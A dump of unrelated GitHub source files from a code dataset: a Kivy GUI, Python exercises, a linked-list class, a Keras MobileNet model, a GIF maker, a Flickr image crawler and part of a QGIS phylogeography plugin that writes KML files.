flash(\"date_siting must be filled in\",\"sasq\")\n return is_valid\n","repo_name":"Blasphony/Coding-Folder","sub_path":"Python/flask_mysql/belt_review/Sasq/flask_app/models/sasq.py","file_name":"sasq.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72556173433","text":"from kivy.app import App\nfrom kivy.uix.button import Button\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.textinput import TextInput\nclass GridApp(App):\n def build(self):\n bl = BoxLayout (orientation = \"vertical\", padding = 10 )\n gl = GridLayout(rows = 2)\n gl.add_widget(Button(text = \"Выбрать магазин\", on_press = self.VibratMagazApp))\n gl.add_widget(Button(text = \"Вести свой предмет и цену\"))\n \n \n bl.add_widget(gl)\n return bl\nclass VibratMagazApp(App):\n def build(self):\n bl = BoxLayout (orientation = \"vertical\", padding = 10 )\n gl = GridLayout(rows = 3)\n gl.add_widget(Button(text = \"Сильпо\" ))\n gl.add_widget(Button(text = \"МегаМаркет\"))\n gl.add_widget(Button(text = \"Атб\"))\n bl.add_widget(gl)\n return bl\n\nclass MyApp(App):\n def build(self):\n bf = BoxLayout (orientation = \"vertical\", padding = 10 )\n gf = GridLayout(rows = 2)\n gf.add_widget(Button(text = \"Тип : пикник\"))\n gf.add_widget(Button(text = \"Тип : вечеринка\"))\n \n bf.add_widget(gf)\n return bf\nclass VestipredmetApp(App):\n def build (self):\n bl = BoxLayout (orientation = \"vertical\", padding = 10 )\n gl = GridLayout(rows = 4)\n gl.add_widget(TextInput(text = \"Введите название предмета\"))\n gl.add_widget(TextInput(text = \"Введите цену на предмет\"))\n gl.add_widget (TextInput(text = \"Введите кол. 
людей\"))\n gl.add_widget(Button(text = \"Готово\"))\n bl.add_widget(gl)\n return bl\nclass TipPicnickApp(App):\n def build (self):\n bl = bl = BoxLayout (orientation = \"vertical\", padding = 10 )\n gl = GridLayout(rows = 2)\n gl.add_widget(TextInput(text = \"Введите название точное название продукта\"))\n gl.add_widget(Button(text = \"Готово\"))\nif __name__ == \"__main__\":\n GridApp().run()\n","repo_name":"Merdet/proect1","sub_path":"gh/project.py.py","file_name":"project.py.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"34496767013","text":"#Jaime Santiago Garci­a\n#No. de registro: 20310369\n#Practica #18\n\n#---------------------------------------------------------------------------------------------\n\n# Crea una lista de 10 elementos\ncolores = ['rojo', 'azul', 'verde', 'amarillo', 'marrón', 'lila', 'negro', 'rosa', 'blanco', 'naranja'] \n# Convierte la lista en una tupla usando la función tuple()\ncolorestupla = tuple(colores)\n# Imprime el tipo de dato de la tupla resultante usando la función type()\nprint(type(colorestupla))\n","repo_name":"Jsantiago29/IA-Practicas-Parcial1","sub_path":"23_02_26-018_ConvertiraTupla_V01.py","file_name":"23_02_26-018_ConvertiraTupla_V01.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33785270079","text":"\"\"\"\nTest the 'limited' method from the 'dict' module.\n\"\"\"\n\n# module under test\nfrom vcorelib.dict import limited\n\n\ndef test_limited_basic():\n \"\"\"Test basic functionality of the limited method.\"\"\"\n\n data = {\"a\": 1}\n with limited(data, \"a\", 2):\n assert data[\"a\"] == 2\n assert data[\"a\"] == 1\n\n with limited(data, \"b\"):\n assert \"b\" not in data\n","repo_name":"vkottler/vcorelib","sub_path":"tests/dict/test_limited.py","file_name":"test_limited.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"37706746619","text":"# Create the Node class\n\nclass Node():\n \n def __init__(self, initial_data):\n self.data = initial_data\n self.next = None\n\n \n def setData(self, new_data):\n self.data = new_data\n\n\n def getData(self):\n return self.data\n\n \n def setNext(self, next_node): # adding a node to the linked list\n self.next = next_node\n\n\n def getNext(self):\n return self.next\n\n\nclass UnorderedList():\n \n def __init__(self):\n self.head = None\n self.size = 0\n\n\n def isEmpty(self):\n return self.head == None\n\n \n # this adds a node to the BEGINNING of the list\n def add(self, item):\n temp = Node(item)\n old_head = self.head\n temp.setNext(old_head)\n self.head = temp\n self.size += 1\n\n\n def size(self):\n return self.size\n \n\n def search(self, item):\n current_node = self.head\n while current is not None:\n if current_node.getData() == item:\n return True\n else:\n current_node = current_node.getNext()\n return False\n\n\n def remove(self, item):\n # Set base variables\n current_node = self.head\n previous_node = None\n found = False\n\n # traverse through the list\n while not found:\n # if the node's data == the item, break the loop\n if current_node.getData() == item:\n found = True\n else:\n previous_node = current_node\n current_node = current_node.getNext()\n \n # if the previous node is empty and we found the data\n if previous_node == None and found:\n # set the head of the list 
to the next node; we're just removing the node from the list\n self.head = current_node.getNext()\n # otherwise, if the data is found and there is a previous node, we use THAT data\n elif found:\n previous_node.setNext(current.getNext())\n\n self.size -= 1\n\n\n def append(self, item):\n current_node = self.head\n new_node = Node(item)\n\n if current_node is None:\n self.head = new_node\n else:\n while current_node is not None:\n if current_node.getNext() is None:\n current_node.setNext(new_node)\n \n self.size += 1\n\n\n def insert(self, item, position):\n current_node = self.head\n previous_node = None\n new_node = Node(item)\n count = 0\n\n \n if position == 0:\n self.add(new_node)\n else:\n # Keep getting nodes until we're in position\n while count != position:\n previous_node = current_node\n current_node = current_node.getNext()\n count += 1\n\n new_node.setNext(current_node)\n previous_node.setNext(new_node)\n\n self.size += 1\n \n \n def index(self, item):\n current_node = self.head\n count = 0\n\n while current_node is not None:\n if current_node.getData() == item:\n return count\n else:\n current_node = current_node.getNext()\n count += 1\n\n\n def pop(self, position = None): # O(log n)\n if position is None:\n position = self.size\n current_node = self.head\n previous_node = None\n next_node = current_node.getNext()\n count = 0\n # Check to see if we're at position\n\n while position != count: # O(log n)\n previous_node = current_node\n current_node = next_node\n next_node = current_node.getNext()\n count += 1\n\n data = current_node.getData()\n previous_node.setNext(next_node)\n\n self.size -= 1 \n \n return data\n\n\n \n\n\n\n \"\"\"\n\n if next_node is None:\n self.head = None\n else:\n while next_node is not None:\n previous_node = current_node\n current_node = current_node.getNext()\n next_node = current_node.getNext()\n \n previous_node.setNext(None)\n \n return current_node.getData()\n \"\"\" \n\n \n \n \n\n\n\n","repo_name":"dmmceldowney/python-algorithms-examples-notes","sub_path":"chapter3/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"15725409008","text":"import warnings\nimport numpy as np\n\nfrom keras.preprocessing import image\nfrom keras.models import Model\nfrom keras.layers import DepthwiseConv2D,Input,Activation,Dropout,Reshape,BatchNormalization,GlobalAveragePooling2D,GlobalMaxPooling2D,Conv2D\nfrom keras.applications.imagenet_utils import decode_predictions\nfrom keras import backend as K\n\n\ndef MobileNet(input_shape=[224,224,3],\n depth_multiplier=1,\n dropout=1e-3,\n classes=1000):\n\n\n img_input = Input(shape=input_shape)\n\n # 224,224,3 -> 112,112,32 \n x = _conv_block(img_input, 32, strides=(2, 2))\n # 112,112,32 -> 112,112,64\n x = _depthwise_conv_block(x, 64, depth_multiplier, block_id=1)\n\n\n # 112,112,64 -> 56,56,128\n x = _depthwise_conv_block(x, 128, depth_multiplier,\n strides=(2, 2), block_id=2)\n # 56,56,128 -> 56,56,128\n x = _depthwise_conv_block(x, 128, depth_multiplier, block_id=3)\n\n\n # 56,56,128 -> 28,28,256\n x = _depthwise_conv_block(x, 256, depth_multiplier,\n strides=(2, 2), block_id=4)\n # 28,28,256 -> 28,28,256\n x = _depthwise_conv_block(x, 256, depth_multiplier, block_id=5)\n \n\n # 28,28,256 -> 14,14,512\n x = _depthwise_conv_block(x, 512, depth_multiplier,\n strides=(2, 2), block_id=6)\n # 14,14,512 -> 14,14,512\n x = _depthwise_conv_block(x, 512, depth_multiplier, block_id=7)\n x = 
_depthwise_conv_block(x, 512, depth_multiplier, block_id=8)\n x = _depthwise_conv_block(x, 512, depth_multiplier, block_id=9)\n x = _depthwise_conv_block(x, 512, depth_multiplier, block_id=10)\n x = _depthwise_conv_block(x, 512, depth_multiplier, block_id=11)\n\n # 14,14,512 -> 7,7,1024\n x = _depthwise_conv_block(x, 1024, depth_multiplier,\n strides=(2, 2), block_id=12)\n x = _depthwise_conv_block(x, 1024, depth_multiplier, block_id=13)\n\n # 7,7,1024 -> 1,1,1024\n # 7x7x1024 \n # 1024\n x = GlobalAveragePooling2D()(x)\n x = Reshape((1, 1, 1024), name='reshape_1')(x)\n x = Dropout(dropout, name='dropout')(x)\n # 1024*2\n x = Conv2D(classes, (1, 1),padding='same', name='conv_preds')(x)\n x = Activation('softmax', name='act_softmax')(x)\n x = Reshape((classes,), name='reshape_2')(x)\n\n inputs = img_input\n\n model = Model(inputs, x, name='mobilenet_1_0_224_tf')\n\n return model\n\ndef _conv_block(inputs, filters, kernel=(3, 3), strides=(1, 1)):\n x = Conv2D(filters, kernel,\n padding='same',\n use_bias=False,\n strides=strides,\n name='conv1')(inputs)\n x = BatchNormalization(name='conv1_bn')(x)\n return Activation(relu6, name='conv1_relu')(x)\n\n\ndef _depthwise_conv_block(inputs, pointwise_conv_filters,\n depth_multiplier=1, strides=(1, 1), block_id=1):\n\n x = DepthwiseConv2D((3, 3),\n padding='same',\n depth_multiplier=depth_multiplier,\n strides=strides,\n use_bias=False,\n name='conv_dw_%d' % block_id)(inputs)\n\n x = BatchNormalization(name='conv_dw_%d_bn' % block_id)(x)\n x = Activation(relu6, name='conv_dw_%d_relu' % block_id)(x)\n\n x = Conv2D(pointwise_conv_filters, (1, 1),\n padding='same',\n use_bias=False,\n strides=(1, 1),\n name='conv_pw_%d' % block_id)(x)\n x = BatchNormalization(name='conv_pw_%d_bn' % block_id)(x)\n return Activation(relu6, name='conv_pw_%d_relu' % block_id)(x)\n\ndef relu6(x):\n return K.relu(x, max_value=6)\n\n\ndef preprocess_input(x):\n x /= 255.\n x -= 0.5\n x *= 2.\n return x\n\n# if __name__ == '__main__':\n# model = MobileNet(input_shape=(224, 224, 3))\n#\n# # model.summary()\n#\n# img_path = 'elephant.jpg'\n# img = image.load_img(img_path, target_size=(224, 224))\n# x = image.img_to_array(img)\n# x = np.expand_dims(x, axis=0)\n# x = preprocess_input(x)\n# print('Input image shape:', x.shape)\n#\n# preds = model.predict(x)\n# print(np.argmax(preds))\n# print('Predicted:', decode_predictions(preds, 1))\n","repo_name":"Aristochi/Dangerous_driving_behavior_detection","sub_path":"Facemask/mobileNet.py","file_name":"mobileNet.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"en","doc_type":"code","stars":170,"dataset":"github-code","pt":"95"} +{"seq_id":"12794514055","text":"from PIL import Image, ImageDraw, ImageFont\nimport imageio\nfrom pathlib import Path\nimport sys\nfrom resizeimage import resizeimage\n\ninput_text = sys.argv[1]\nlines = input_text.split('/')\n\noriginal_image = Image.open('corona.jpg')\noriginal_image = resizeimage.resize_height(original_image, 500)\noriginal_image.save(\"resized.png\")\n\nresized_image = Image.open(\"resized.png\")\n(width, height) = resized_image.size\nresized_image = resized_image.crop((width/2 - 250, height/2 - 250, width/2 + 250, height/2+250))\nresized_image = resized_image.point(lambda p: p * 0.3)\n\ndraw = ImageDraw.Draw(resized_image)\n\ndef drawText(text, output_name, y = 50):\n font = ImageFont.truetype('rm_typerighter.ttf', size=60)\n x = 50\n color = 'rgb(255, 255, 255)'\n\n draw.text((x, y), text, fill=color, font=font)\n\n resized_image.save(\"source_images/\" + 
output_name + \".png\")\n print(\"\\tCreated: \" + output_name + \".png\")\n\ndef drawLines(lines):\n y_value = 50\n scene_num = 1\n for line in lines:\n for i in range(1, len(line) + 1):\n partial = \"\"\n for j in range(i):\n partial += line[j]\n\n drawText(partial, \"scene_\" + str(scene_num), y_value)\n scene_num += 1\n y_value += 60\n\ndef makeGif():\n image_path = Path('source_images')\n images = list(image_path.glob('*.png'))\n image_list = []\n\n for file_name in images:\n image_list.append(imageio.imread(file_name))\n print(\"\\tFile:\", file_name, \"read\")\n\n print(\"Writing GIF\")\n imageio.mimwrite('result.gif', image_list, duration=0.1)\n print(\"DONE\")\n\n\ndrawLines(lines)\nmakeGif()\n\n","repo_name":"alvanrahimli/gif_maker_app","sub_path":"create_images.py","file_name":"create_images.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"69910467192","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nimport json\nimport math\nimport os\n\nfrom six.moves.urllib.parse import urlencode\n\nfrom icrawler import Crawler, Feeder, Parser, ImageDownloader\n\n\nclass FlickrFeeder(Feeder):\n\n def feed(self, apikey=None, max_num=4000, **kwargs):\n self.logger.debug('feed in')\n if apikey is None:\n apikey = os.getenv('FLICKR_APIKEY')\n if not apikey:\n self.logger.error('apikey is not specified')\n return\n\n self.logger.debug('apikey:{}'.format(apikey))\n\n if max_num > 4000:\n max_num = 4000\n self.logger.warning(\n 'max_num exceeds 4000, set it to 4000 automatically.')\n base_url = 'https://api.flickr.com/services/rest/?'\n params = {\n 'method': 'flickr.photos.search',\n 'api_key': apikey,\n 'format': 'json',\n 'nojsoncallback': 1\n }\n for key in kwargs:\n if key in ['user_id', 'tags', 'tag_mode', 'text', 'license',\n 'sort', 'privacy_filter', 'accuracy', 'safe_search',\n 'content_type', 'machine_tags', 'machine_tag_mode',\n 'group_id', 'contacts', 'woe_id', 'place_id', 'has_geo',\n 'geo_context', 'lat', 'lon', 'radius', 'radius_units',\n 'is_commons', 'in_gallery', 'is_getty', 'extras',\n 'per_page', 'page']: # yapf: disable\n params[key] = kwargs[key]\n elif key in ['min_upload_date', 'max_upload_date',\n 'min_taken_date', 'max_taken_date']: # yapf: disable\n val = kwargs[key]\n if isinstance(val, datetime.date):\n params[key] = val.strftime('%Y-%m-%d')\n elif isinstance(val, (int, str)):\n params[key] = val\n else:\n self.logger.error('%s is invalid', key)\n else:\n self.logger.error('Unrecognized search param: %s', key)\n\n url = base_url + urlencode(params)\n per_page = params.get('per_page', 10)\n page = params.get('page', 1)\n page_max = int(math.ceil(max_num / per_page))\n self.logger.debug('max_num:{},per_page:{},page:{},page_max:{}'.format(max_num,per_page,page, page_max))\n for i in range(page, page + page_max):\n complete_url = '{}&page={}'.format(url, i)\n self.output(complete_url)\n self.logger.debug('put url to url_queue: {}'.format(complete_url))\n\n\nclass FlickrParser(Parser):\n\n def parse(self, response):\n content = json.loads(response.content.decode())\n if content['stat'] != 'ok':\n return\n photos = content['photos']['photo']\n for photo in photos:\n farm_id = photo['farm']\n server_id = photo['server']\n photo_id = photo['id']\n secret = photo['secret']\n img_url = 'https://farm{}.staticflickr.com/{}/{}_{}.jpg'.format(\n farm_id, server_id, photo_id, secret)\n yield dict(file_url=img_url, meta=photo)\n\n\nclass FlickrImageCrawler(Crawler):\n\n def 
__init__(self,\n apikey=None,\n feeder_cls=FlickrFeeder,\n parser_cls=FlickrParser,\n downloader_cls=ImageDownloader,\n *args,\n **kwargs):\n self.apikey = apikey\n super(FlickrImageCrawler, self).__init__(\n feeder_cls, parser_cls, downloader_cls, *args, **kwargs)\n\n def crawl(self, max_num=1000, file_idx_offset=0, **kwargs):\n kwargs['apikey'] = self.apikey\n kwargs['max_num'] = max_num\n super(FlickrImageCrawler, self).crawl(\n feeder_kwargs=kwargs,\n downloader_kwargs=dict(\n max_num=max_num, file_idx_offset=file_idx_offset))\n","repo_name":"DevinWangGZ/picture_crawler","sub_path":"icrawler/builtin/flickr.py","file_name":"flickr.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"17337235546","text":"import csv, os, sys, string, Cookie, sha, time, random, cgi, urllib\nimport datetime, StringIO, pickle, urllib2\n\nfrom PyQt4 import *\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom qgis.core import *\nfrom qgis.gui import *\n\nfrom ui.ui_phylogeorecdialog import Ui_PhyloGeoRecDialogBase\n\nfrom export import exportToThreeJS\nfrom exportsettings import ExportSettings\nfrom qgis2threejscore import ObjectTreeItem, MapTo3D\nfrom phylogeorectools import logMessage\nfrom rotatedrect import RotatedRect\nfrom settings import debug_mode, def_vals, plugin_version\nimport propertypages as ppages\nimport phylogeorectools as tools\n\n# Import external libraries\nfrom Bio import Phylo\nimport logging\nfrom geotree_parse_neo2b import *\n\nclass PhyloGeoRecDialog(QDialog):\n\n#Init Section\n\n def __init__(self, iface, objectTypeManager, pluginManager, projectSettings, exportSettings=None, lastTreeItemData=None):\n # QGIS2threejs Section Starts Here #\n QDialog.__init__(self, iface.mainWindow())\n self.iface = iface\n self.objectTypeManager = objectTypeManager\n self.pluginManager = pluginManager\n self._settings = exportSettings or {}\n self.lastTreeItemData = lastTreeItemData\n self.localBrowsingMode = True\n\n self.rb_quads = self.rb_point = None\n\n self.templateType = None\n self.currentItem = None\n self.currentPage = None\n\n # Set up the user interface from Designer.\n self.ui = ui = Ui_PhyloGeoRecDialogBase()\n ui.setupUi(self)\n\n self.setWindowFlags(self.windowFlags() | Qt.WindowMinimizeButtonHint)\n\n # output html filename\n #ui.lineEdit_OutputFilename.setText(self._settings.get(\"OutputFilename\", \"\")) -> Weird!\n ui.lineEdit_OutputFilename.setPlaceholderText(\"[Temporary file]\")\n\n # settings button\n icon = QIcon(os.path.join(tools.pluginDir(), \"icons\", \"settings.png\"))\n ui.toolButton_Settings.setIcon(icon)\n\n # popup menu displayed when settings button is pressed\n items = [[\"Load Settings...\", self.loadSettings],\n [\"Save Settings As...\", self.saveSettings],\n [None, None],\n [\"Clear Settings\", self.clearSettings],\n [None, None],\n [\"Plugin Settings...\", self.pluginSettings]]\n\n self.menu = QMenu()\n self.menu_actions = []\n for text, slot in items:\n if text:\n action = QAction(text, iface.mainWindow())\n action.triggered.connect(slot)\n self.menu.addAction(action)\n self.menu_actions.append(action)\n else:\n self.menu.addSeparator()\n\n ui.toolButton_Settings.setMenu(self.menu)\n ui.toolButton_Settings.setPopupMode(QToolButton.InstantPopup)\n\n # progress bar and message label\n ui.progressBar.setVisible(False)\n ui.label_MessageIcon.setVisible(False)\n\n # buttons\n ui.pushButton_Run.clicked.connect(self.run)\n 
ui.pushButton_Close.clicked.connect(self.reject)\n ui.pushButton_Help.clicked.connect(self.help)\n\n # set up map tool\n self.previousMapTool = None\n self.mapTool = RectangleMapTool(iface.mapCanvas())\n #self.mapTool = PointMapTool(iface.mapCanvas())\n\n # set up the template combo box\n #self.initTemplateList() -> Weird!\n self.ui.comboBox_Template.currentIndexChanged.connect(self.currentTemplateChanged)\n\n # set up the properties pages\n self.pages = {}\n self.pages[ppages.PAGE_WORLD] = ppages.WorldPropertyPage(self)\n self.pages[ppages.PAGE_CONTROLS] = ppages.ControlsPropertyPage(self)\n self.pages[ppages.PAGE_DEM] = ppages.DEMPropertyPage(self)\n self.pages[ppages.PAGE_VECTOR] = ppages.VectorPropertyPage(self)\n container = ui.propertyPagesContainer\n for page in self.pages.itervalues():\n page.hide()\n container.addWidget(page)\n\n # build object tree\n self.topItemPages = {ObjectTreeItem.ITEM_WORLD: ppages.PAGE_WORLD, ObjectTreeItem.ITEM_CONTROLS: ppages.PAGE_CONTROLS, ObjectTreeItem.ITEM_DEM: ppages.PAGE_DEM}\n self.initObjectTree()\n self.ui.treeWidget.currentItemChanged.connect(self.currentObjectChanged)\n self.ui.treeWidget.itemChanged.connect(self.objectItemChanged)\n self.currentTemplateChanged() # update item visibility\n\n ui.toolButton_Browse.clicked.connect(self.browseClicked)\n\n #iface.mapCanvas().mapToolSet.connect(self.mapToolSet) # to show button to enable own map tool\n\n # PhyloGeoRec Section Starts Here #\n\n # connect to main components\n self.ui.cmdBrwPhylo.clicked.connect(self.loadPhyloTreeFile)\n self.ui.cmdBrwRelationTable.clicked.connect(self.loadRelationTableFile)\n self.ui.cmdBrwGeoPath.clicked.connect(self.saveGeophylogenyProjectFolder)\n self.ui.cmdGenGeo.clicked.connect(self.generateRealSamplingPoint)\n self.ui.cmdGenGeo.clicked.connect(self.generateGeophylogeny_LeafNodes)\n self.ui.cmdGenGeo.clicked.connect(self.generateGeophylogeny_LeafZ)\n self.ui.cmdGenGeo.clicked.connect(self.generateGeophylogeny_TreeNodes)\n self.ui.cmdGenGeo.clicked.connect(self.generateGeophylogeny_TreeNetworks)\n self.ui.cmdGenGeo.clicked.connect(self.generateGeophylogeny_RootPoint)\n # self.ui.cmdGenGeo.clicked.connect(self.generateGeophylogenyDropline) # Dropline generation cannot be performed in QGIS, due to qgisgeom doesn't support Z.\n\n # Build Phylogenetic Tree Viewer\n QObject.connect(self.ui.cmdBrwPhylo, SIGNAL(\"clicked()\"), self.updatePhyloTreeView)\n\n # Build Table Viewer\n self.model = QtGui.QStandardItemModel(self)\n self.ui.tableView_Relation.setModel(self.model)\n self.ui.tableView_Relation.horizontalHeader().setStretchLastSection(True)\n\n\n QObject.connect(self.ui.cmdBrwRelationTable, SIGNAL(\"clicked()\"), self.drawDataTable)\n # QObject.connect(self.tabWidget, SIGNAL('currentChanged (int)'), self.drawDataTable)\n\n\n#Init Section End\n\n\n#Data Props Section\n\n def loadPhyloTreeFile(self):\n # file open dialog for Phylogenetic Tree\n tree_dir = os.getcwd()\n if not tree_dir:\n tree_dir = os.path.split(self.ui.lineEdit_Phylo.text())[0]\n if not tree_dir:\n tree_dir = os.path.dirname(QFile.decodeName(__file__))\n tree_filterString = \"Newick Tree File (*.nwk;*.tre);;GenGIS GeoTree Model (*.gtm);;All Files (*.*)\"\n tree_filename = QFileDialog.getOpenFileName(self, \"Load Phylogenetic Tree\", tree_dir, tree_filterString)\n if not tree_filename:\n return\n\n self.ui.lineEdit_Phylo.setText(tree_filename)\n\n if str(self.ui.lineEdit_Phylo.text()) == \"\":\n pass\n\n #Dump Tree in dumps\n treedump = open(self.ui.lineEdit_Phylo.text()).read()\n 
self.ui.textEdit_Phylo.setText(treedump)\n\n def loadRelationTableFile(self):\n # file open dialog for Relation Table\n relatbl_dir = os.getcwd()\n if not relatbl_dir:\n relatbl_dir = os.path.split(self.ui.lineEdit_RelationTablePath.text())[0]\n if not relatbl_dir:\n relatbl_dir = os.path.dirname(QFile.decodeName(__file__))\n relatbl_filterString = \"Comma Separated Values (*.csv);;;;All Files (*.*)\"\n\n csvFilePath = QFileDialog.getOpenFileName(\n self,\n \"Load Relation Table\",\n relatbl_dir,\n relatbl_filterString)\n if csvFilePath:\n relatbl_filename = csvFilePath\n if not relatbl_filename:\n return\n\n self.ui.lineEdit_RelationTablePath.setText(relatbl_filename)\n\n if str(self.ui.lineEdit_RelationTablePath.text()) == \"\":\n pass\n\n #Dump Coords in dumps\n coordsdump = open(self.ui.lineEdit_RelationTablePath.text()).read()\n self.ui.textEdit_Coords.setText(coordsdump)\n\n def saveGeophylogenyProjectFolder(self, geoprj_dir=None):\n if not geoprj_dir:\n # file save dialog\n geoprj_dir = os.getcwd()\n if not geoprj_dir:\n geoprj_dir = os.path.split(self.ui.lineEdit_GeoPath.text())[0]\n if not geoprj_dir:\n geoprj_dir = QDir.homePath()\n geoprj_dir = QFileDialog.getExistingDirectory(self, \"Save Phylogeography Model to Folder ...\")\n if not geoprj_dir:\n return\n\n self.ui.lineEdit_GeoPath.setText(geoprj_dir + '\\\\')\n\n if str(self.ui.lineEdit_GeoPath.text()) == \"\":\n pass\n\n#Data Props Section End\n\n\n#Relation Table Section\n def drawDataTable(self, role = Qt.DisplayRole):\n #Test Update\n self.ui.tableView_Relation.clearSpans()\n\n #get CSV\n CSVName = self.ui.lineEdit_RelationTablePath.text()\n\n with open(CSVName, \"rb\") as mycsvfile:\n thedata = csv.reader(mycsvfile, delimiter = ';')\n # Fill Data\n # thedata.next() -. Skip data in CSV first line\n for row in thedata:\n items = [\n QtGui.QStandardItem(field)\n for field in row\n ]\n self.model.appendRow(items)\n self.ui.tableView_Relation.setModel(self.model)\n#Relation Table Section End\n\n\n#Phylogenetic Tree Viewer Section\n def updatePhyloTreeView(self):\n phylo_tree = Phylo.read(self.ui.lineEdit_Phylo.text(), 'newick')\n\n #Note: it will print the branch lengths on the edges, but we will remove\n #all lengths that are less than 0.02 to avoid clutter\n #Must it changed?\n # phylo_tree_draw = Phylo.draw(phylo_tree, branch_labels=lambda c:\n # c.branch_length if c.branch_length > 0.02 else None,\n # axes=ax)\n\n #Note: This code will print the branch lengths on the edges, and not remove even the clutter stuffs\n Phylo.draw(phylo_tree, branch_labels=lambda c: c.branch_length)\n # return True\n#Phylogenetic Tree Viewer Section End\n\n\n\n#Generate Geophylogeny Construct\n def generateRealSamplingPoint(self, rsp_filename=None):\n if not rsp_filename:\n # file save dialog\n rsp_directory = os.path.split(self.ui.lineEdit_GeoPath.text())[0]\n rsp_filename = QFileDialog.getSaveFileName(self, \"Save Real Sampling Point Data\", rsp_directory, \"Keyhole Markup Language (*.kml)\")\n if not rsp_filename:\n return\n\n if str(self.ui.lineEdit_Phylo.text()) == '' and str(self.ui.lineEdit_RelationTablePath.text()) == '':\n QMessageBox.warning(self, \"PhyloGeoRec\", \"Required data not satisfied. 
Please check\")\n return\n\n #Create Real Sampling Point\n #Load Data\n data = csv.reader(open(self.ui.lineEdit_RelationTablePath.text()), delimiter = ';')\n #Skip the 1st header row.\n #data.next()\n #Open the file to be written.\n f = open(rsp_filename, 'w')\n #Writing the kml file.\n f.write(\"\\n\")\n f.write(\"\"\"\\n\"\"\")\n f.write(\"\\n\")\n f.write(\"\\n\")\n f.write(\" Sampling Points \\n\")\n #TODO: Make Flexible, so user can input which row they needed freely\n for row in data:\n f.write(\" \\n\")\n f.write(\" \" + str(row[0]) + \"\\n\")\n f.write(\" \" + str(row[0]) + \"\\n\")\n f.write(\" \\n\")\n f.write(\" \" + str(row[2]) + \",\" + str(row[1]) + \"\\n\") # With elev, however it not yet yound. If found: f.write(\" \" + str(row[x]) + \",\" + str(row[y]) + \",\" + str(row[z]) + \"\\n\")\n f.write(\" \\n\")\n f.write(\" \\n\")\n f.write(\"\\n\")\n f.write(\"\\n\")\n f.write(\"\\n\")\n f.close()\n\n def generateGeophylogeny_LeafNodes(self, leafnodes_filename=None):\n kml = \"\"\n if not leafnodes_filename:\n # file save dialog\n workdir = os.path.split(self.ui.lineEdit_GeoPath.text())[0]\n leafnodes_filename = QFileDialog.getSaveFileName(self, \"Save Phylogeography Reconstruction Leaf Nodes Data\", workdir, \"Keyhole Markup Laguage (*.kml)\")\n if not leafnodes_filename:\n return\n\n #advanced fields\n #TODO: Make flexible for future\n mydomain = \"http://nkresearch.ub.ac.id\"\n branch_color = \"FF00FF00\"\n branch_width = 3\n icon = \"http://maps.google.com/mapfiles/kml/shapes/placemark_circle.png\"\n alt_grow = 1000\n proximity = 3\n title = \"Geophylogeny Leaf Nodes\"\n\n #Let's Rock\n\n #Retrieve dumped elements to string\n tree = str(self.ui.textEdit_Phylo.toPlainText()) #self.request.get('tree')\n coords = str(self.ui.textEdit_Coords.toPlainText()) #self.request.get('coords')\n #kmlMeta = build_kml_leaf(tree,coords,branch_color,branch_thickness,icon,alt_grow,proximity,title) #mydomain removed\n kmlMeta = build_kml_leafnodes(tree,coords,mydomain,branch_color,branch_width,icon,alt_grow,proximity,title)\n kml = kmlMeta.kml\n taxa = kmlMeta.taxa\n err = kmlMeta.err\n type = kmlMeta.type\n\n f = open(leafnodes_filename, 'w')\n f.write(str(kml))\n f.close()\n\n\n def generateGeophylogeny_LeafZ(self, leafz_filename=None):\n kml = \"\"\n if not leafz_filename:\n # file save dialog\n workdir = os.path.split(self.ui.lineEdit_GeoPath.text())[0]\n leafz_filename = QFileDialog.getSaveFileName(self, \"Save Phylogeography Reconstruction Leaf Z Attribute Data\", workdir, \"Keyhole Markup Laguage (*.kml)\")\n if not leafz_filename:\n return\n\n #advanced fields\n #TODO: Make flexible for future\n mydomain = \"http://nkresearch.ub.ac.id\"\n branch_color = \"FF00FF00\"\n branch_width = 3\n icon = \"http://maps.google.com/mapfiles/kml/shapes/placemark_circle.png\"\n alt_grow = 1000\n proximity = 3\n title = \"Geophylogeny Leaf Z Attributes\"\n\n #Let's Rock\n\n #Retrieve dumped elements to string\n tree = str(self.ui.textEdit_Phylo.toPlainText()) #self.request.get('tree')\n coords = str(self.ui.textEdit_Coords.toPlainText()) #self.request.get('coords')\n #kmlMeta = build_kml_leaf(tree,coords,branch_color,branch_thickness,icon,alt_grow,proximity,title) #mydomain removed\n kmlMeta = build_kml_leafZ(tree,coords,mydomain,branch_color,branch_width,icon,alt_grow,proximity,title)\n kml = kmlMeta.kml\n taxa = kmlMeta.taxa\n err = kmlMeta.err\n type = kmlMeta.type\n\n f = open(leafz_filename, 'w')\n f.write(str(kml))\n f.close()\n\n\n def generateGeophylogeny_TreeNodes(self, 
